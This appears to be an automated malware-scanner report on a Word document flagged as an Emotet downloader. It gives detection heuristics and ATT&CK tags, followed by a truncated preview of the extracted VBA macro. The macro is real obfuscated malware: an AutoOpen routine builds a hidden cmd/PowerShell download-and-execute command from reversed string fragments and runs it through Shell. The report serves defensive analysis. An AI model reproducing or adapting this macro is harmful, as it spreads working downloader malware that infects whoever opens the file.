MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6826430-0', indicating a downloader for the Emotet family. The presence of a VBA macro with an 'AutoOpen' subroutine, which is a common execution vector, further supports this. The macro uses the Shell function to execute a command, likely downloading and running a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6826430-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826430-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12532 bytes |
SHA-256: bef3386ad096127f711363ce787e007b8eb1617cf39dad6b0693d1bf3f3f6c09 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iizjCRDRuNsVA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim MHFnZ(2)
MHFnZ(0) = Left("wZfvzKsw", 484)
MHFnZ(1) = Mid("Dboiscm", 481, 162)
Dim IAHmvO(2)
IAHmvO(0) = MidB("cUPIQi", 996, 290)
IAHmvO(1) = Right("uufbE", 228)
Dim TjjXN(1)
TjjXN(0) = MidB("EzNaa", 820, 569)
Dim jUaok(1)
jUaok(0) = Mid("cjHCivEw", 444, 128)
Dim jlwKh(1)
jlwKh(0) = Mid("UsvSOL", 697, 399)
Dim vwXZi(1)
vwXZi(0) = Mid("zTSvv", 551, 813)
Dim zciihY(2)
zciihY(0) = MidB("frzFRI", 620, 219)
zciihY(1) = Left("hPGnLRoz", 516)
dMNdIZlc (KeyString(6 + 3 + 9 + 11 + 38) + XzuRhrw + IlCbz + zAnMa + XKWczi + QpOzmQzA + fIMRSkQDkPHW)
Dim hXVMz(2)
hXVMz(0) = Left("LuktwQMi", 565)
hXVMz(1) = Left("MuBQB", 199)
Dim OsTjo(2)
OsTjo(0) = Left("DbwSPCi", 122)
OsTjo(1) = MidB("rjKjAkz", 516, 889)
Dim jwqcjQ(1)
jwqcjQ(0) = Right("ZhkAfG", 689)
End Sub
Function dMNdIZlc(pEEQlpihAs As String)
Dim Xjcizz(2)
Xjcizz(0) = MidB("bjaNomz", 276, 954)
Xjcizz(1) = Mid("FCiljzhd", 631, 577)
Dim nVlvSw(2)
nVlvSw(0) = MidB("Xhljs", 657, 46)
nVlvSw(1) = Left("zcjDDi", 211)
Shell@ pEEQlpihAs, CInt(msoBarTypeNormal)
Dim vUzmKD(2)
vUzmKD(0) = MidB("ULShzbW", 179, 318)
vUzmKD(1) = Right("uwoDvjE", 726)
Dim MiRFOd(1)
MiRFOd(0) = MidB("pqqku", 18, 321)
Dim HcBJX(1)
HcBJX(0) = Right("WXZjJFM", 149)
Dim LNTkn(1)
LNTkn(0) = Mid("ZfbRfSU", 609, 393)
End Function
Attribute VB_Name = "wpULVtBFvTmAKp"
Function XzuRhrw()
Dim vQKEwr(1)
vQKEwr(0) = MidB("dDmSkhE", 421, 648)
Dim zqSdz(1)
zqSdz(0) = Right("pTCJz", 633)
Dim waAsXO(2)
waAsXO(0) = Mid("tiuzhJ", 918, 331)
waAsXO(1) = MidB("CSAaiR", 478, 701)
nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s"
Dim aTAjiw(2)
aTAjiw(0) = Mid("vfsfA", 341, 704)
aTAjiw(1) = Left("EwYAkYdR", 323)
NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ "
Dim lUIXjG(1)
lUIXjG(0) = Mid("CIAiF", 936, 39)
Dim ORTSBV(1)
ORTSBV(0) = MidB("zLdLizJY", 871, 549)
Dim ocdWkC(1)
ocdWkC(0) = MidB("HkVwO", 542, 830)
Dim wtrviW(2)
wtrviW(0) = Mid("OjXBKil", 333, 998)
wtrviW(1) = Left("XclQZ", 201)
YRsBNrjwjw = "^ ^" + " ^" + " " + " ^ " + " ^ "
Dim HKZJTc(2)
HKZJTc(0) = Right("jJNWzFQW", 679)
HKZJTc(1) = Right("pnAWPGm", 468)
Dim WEwclc(1)
WEwclc(0) = Left("VnnXW", 719)
HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^"
Dim sEnlP(1)
sEnlP(0) = MidB("wCjZkT", 888, 141)
Dim dcnljL(2)
dcnljL(0) = MidB("OkCmS", 495, 464)
dcnljL(1) = MidB("OPdAFQEs", 638, 967)
mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J"
Dim ofJGw(1)
ofJGw(0) = Right("FQiiV", 112)
Dim QqLIQ(1)
QqLIQ(0) = Mid("wTwinqw", 38, 202)
Dim DUawZr(2)
DUawZr(0) = MidB("vDHhZk", 128, 760)
DUawZr(1) = Left("GQKwRXD", 531)
Dim wdRDr(1)
wdRDr(0) = Left("wIYUUcJ", 303)
OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^"
Dim OzsJc(2)
OzsJc(0) = MidB("nSmszWjU", 410, 760)
OzsJc(1) = MidB("FhIJdBL", 322, 273)
Dim tYzpGW(1)
tYzpGW(0) = MidB("vTijivJh", 299, 297)
Dim fbLvLr(2)
fbLvLr(0) = MidB("VibTH", 251, 68)
fbLvLr(1) = Right("wNWcA", 174)
Dim isirv(2)
isirv(0) = Left("RvlwhsO", 245)
isirv(1) = MidB("ZNuHPMXZ", 393, 43)
SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr"
Dim HSOpZ(1)
HSOpZ(0) = MidB("EuoMlJ", 438, 248)
Dim hstbl(2)
hstbl(0) = Mid("biLAk", 154, 312)
hstbl(1) = Left("QoRhskw", 828)
Dim DSpQE(1)
DSpQE(0) = Mid("ForhiBfr", 894, 817)
Dim Awlvj(2)
Awlvj(0) = Mid("zDKjCOob", 224, 952)
Awlvj(1) = Right("qVSEkTU", 144)
Dim jjWkAh(2)
jjWkAh(0) = Left("FQVmcNqY", 913)
jjWkAh(1) = Mid("fdZowiMw", 944, 829)
zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.